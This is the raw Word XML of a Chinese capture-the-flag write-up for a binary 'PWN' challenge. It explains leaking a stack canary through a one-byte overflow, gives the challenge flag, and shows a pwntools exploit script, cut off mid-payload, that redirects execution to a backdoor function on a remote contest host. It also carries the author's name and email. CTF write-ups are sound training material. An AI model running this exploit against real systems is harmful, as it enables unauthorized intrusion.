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BF03" w14:textId="77777777" w:rsidR="000C5A9A" w:rsidRPr="00131480" w:rsidRDefault="000C5A9A" w:rsidP="00131480">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>QLNU-SEC-2403+于光泽+191897071@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EB83E" w14:textId="7106814F" w:rsidR="000C5A9A" w:rsidRPr="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131480">
        <w:t>PWN</w:t>
      </w:r>
      <w:r w:rsidR="000C5A9A" w:rsidRPr="00131480">
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>enius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DFF20EE" w14:textId="77777777" w:rsidR="000C5A9A" w:rsidRPr="00131480" w:rsidRDefault="000C5A9A" w:rsidP="00131480">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A5C7C" w14:textId="16B90569" w:rsidR="000C5A9A" w:rsidRPr="000C5A9A" w:rsidRDefault="000C5A9A" w:rsidP="000C5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che</w:t>
      </w:r>
      <w:r>
        <w:t>cksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现有</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5A9A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20FFBA" w14:textId="531139F3" w:rsidR="000036FB" w:rsidRDefault="000036FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33D38489" wp14:editId="0B728084">
            <wp:extent cx="5274310" cy="416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0F1" w14:textId="4E98400B" w:rsidR="000C5A9A" w:rsidRDefault="000C5A9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中分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063FC2C" w14:textId="77777777" w:rsidR="000036FB" w:rsidRDefault="000036FB"/>
    <w:p w14:paraId="44DB7ECE" w14:textId="4A491B5B" w:rsidR="009B21DE" w:rsidRDefault="00C63D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FF5FC3D" wp14:editId="6E7A52A9">
            <wp:extent cx="5274310" cy="1736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CD4" w14:textId="56152AFF" w:rsidR="000036FB" w:rsidRDefault="000036FB"/>
    <w:p w14:paraId="051F6DC1" w14:textId="54A6C75F" w:rsidR="000036FB" w:rsidRDefault="000036FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3B5AFC" wp14:editId="3396DCFB">
            <wp:extent cx="5274310" cy="1303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996" w14:textId="3DA86532" w:rsidR="00C63D78" w:rsidRDefault="00C63D78"/>
    <w:p w14:paraId="003F0B1B" w14:textId="6EF7414A" w:rsidR="000036FB" w:rsidRDefault="000036FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05F82DD3" wp14:editId="1D02A18A">
            <wp:extent cx="4145639" cy="1592718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9C69" w14:textId="3F6EA642" w:rsidR="000036FB" w:rsidRDefault="000036FB"/>
    <w:p w14:paraId="12ED164F" w14:textId="18E6D4CD" w:rsidR="000036FB" w:rsidRDefault="000036FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED0045C" wp14:editId="7D441349">
            <wp:extent cx="4206605" cy="210330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8560" w14:textId="2E5E2E11" w:rsidR="00BE7609" w:rsidRPr="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:pPr>
        <w:widowControl/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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131480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131480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>函数存在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>溢出漏洞，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节溢出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。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>且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>程序</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00131480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131480">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>("%s")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>输出缓冲区内容，而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 xml:space="preserve"> Canary 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>的第一个字节固定为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 xml:space="preserve"> 0x00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>（作为字符串终止符）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，可以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>覆盖掉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 xml:space="preserve"> Canary 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>的第一个字节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 xml:space="preserve"> 0x00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，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00131480">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Canary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，构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pay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="00131480"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</w:p>
    <w:p w14:paraId="74528B2C" w14:textId="38A93B6B" w:rsidR="009809D2" w:rsidRDefault="009809D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F595289" wp14:editId="436224B8">
            <wp:extent cx="5274310" cy="1286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0816" w14:textId="77777777" w:rsidR="009809D2" w:rsidRDefault="009809D2"/>
    <w:p w14:paraId="43B82666" w14:textId="2727797E" w:rsidR="00BE7609" w:rsidRDefault="009809D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CCFEE26" wp14:editId="2515CB57">
            <wp:extent cx="5274310" cy="2574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97AA" w14:textId="219B99AE" w:rsidR="009809D2" w:rsidRDefault="009809D2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009809D2">
        <w:t>ISCC{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009809D2">
        <w:t>fed1dc67-2172-4975-a980-04e4d0d60652}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4B722" w14:textId="78F03C02" w:rsidR="00A41A64" w:rsidRDefault="00A41A64" w:rsidP="00A41A64">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>xp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274BA07A" w14:textId="153C76C2" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480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1B583BB8" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>context.update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7C731" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    arch='amd64',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A16D9F" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">   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>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F71B2E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">='info',  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA8E90" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    terminal</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">', '-h']  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BFA31" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9CF0B" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">BINARY_PATH = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>att22'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E89709" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t>TARGET_HOST = '101.200.155.151'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F71D64" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t>TARGET_PORT = 12000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2F7F77" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39AE8E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    elf = ELF(BINARY_PATH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA4B83" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    log.info(f"加载二进制文件: {BINARY_PATH}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FB6D5" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5E5D7" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        io = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>TARGET_HOST, TARGET_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F487D" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(f"成功连接到 {TARGET_HOST}:{TARGET_PORT}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CC605" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761562CA" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log.failure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(f"连接失败: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7BC955" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E795BA" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="4F67BDDC" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="59EB9117" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoor_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.symbols.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('backdoor') or 0x4011AA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A0170" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    log.info(f"后门函数地址: 0x{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoor_addr:x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85F69D" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="21529F1B" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="79AE9FE1" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('yes or no?', 'no')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38691C" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('so modest.', 'thanks')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E252013" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    log.info("完成初始交互")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C6EFD" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="1C4AC3F1" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="7B4BBAE8" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>leak_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E45A0" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>leak_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>leak_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'BC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1E1F8" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="6AD6AE93" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.sendafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">('in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>leak_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4222E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('B')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D02463" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480"/>
    <w:p w14:paraId="4410D676" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500474E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>canary_raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC5E65" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>canary_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = u64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>canary_raw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('C')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E011E" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(f"成功泄露Canary: 0x{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>canary_value:x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD86C3" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027966C" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log.failure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f"Canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>泄露失败: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C26DD4" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>io.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC012A" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C54B05" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DBADD3" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA86B9F" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41359B5D" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>canary_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) +               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40960824" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        p64(0) +                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C3203F" w14:textId="77777777" w:rsidR="00131480" w:rsidRDefault="00131480" w:rsidP="00131480">
      <w:r>
        <w:t xml:space="preserve">        p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoor_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
